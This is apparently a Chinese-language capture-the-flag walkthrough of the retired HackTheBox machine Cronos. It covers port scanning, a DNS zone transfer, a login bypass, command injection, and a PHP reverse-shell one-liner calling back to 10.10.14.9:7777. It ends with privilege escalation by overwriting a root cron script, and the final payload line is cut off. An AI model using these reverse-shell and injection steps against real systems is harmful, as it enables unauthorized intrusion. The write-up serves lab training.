HACKTHEBOX通关笔记——Cronos（退役）

开启环境，调试网络确保互联互通

拿到IP之后还是先来做一下端口扫描，nmap --rate-min=5000 -p-  -v ip，也可以加个-Pn做下禁ping扫描，当然这个速率很快，实际攻防时候加了pn参数也是容易被发现的，所以对抗时候还是要做IP代理扫描。

拿到端口信息后详细扫一下nmap -A -p22，80，53 -v ip

没发现什么可用信息，只好先从80入手，尝试访问发现是个默认页面，目录扫描也没什么成果，如果继续莽估计是不好说结果如何了，但是一定会浪费时间。而且这个比较蹊跷，平常都是IP域名信息都有，这次只有IP没有域名，不妨想想是不是遗漏了什么，

这时候想想还有一个53端口，关于dns服务，平常面试的时候考官会问问你，给个域名怎么反查IP，给个IP怎么看域名，听到比较多的就是windows就使用nslookup命令、linux使用dig命令，网页工具或者微步等等。

正向查询（通过域名查IP）： 

nslookup 域名 要使用的DNS服务器

dig @DNS服务器 域名

dig @DNS服务器 axfr 域名（此命令通过axfr获取完整dns区域传送）

反向查询（通过IP查域名）：

nslookup IP地址 要使用的DNS服务器

dig -x IP地址 @DNS服务器

先根据IP查询一下域名：

Nslookup 查询

Dig查询

获取到根域crons.htb，然后我们可以再进一步查询该根域名下是否还有子域名，这里也可以通过gobuster去爆破

访问测试，发现是一个登录框，简单尝试发现有万能密码漏洞

然后是一个路由探测的网页工具，抓包发现这里可以做命令执行，可以直接反弹shell，因为目录是个php文件，可以使用php去反弹。

写一下php反弹payload，注意bp里边执行需要做一下url编码：

php -r '$sock=fsockopen("10.10.14.9",7777);exec("sh <&3 >&3 2>&3");'

补齐ttyshell：python3 -c 'import pty;pty.spawn("/bin/bash")';

拿到基础flag，一般存放home下

提权查看计划任务，发现有一个www下一个php文件每分钟以root身份执行。

cp复制备份一下该文件，随后可以写一个反弹shell的马子

echo '&3 2>&3"); ?>' > artisan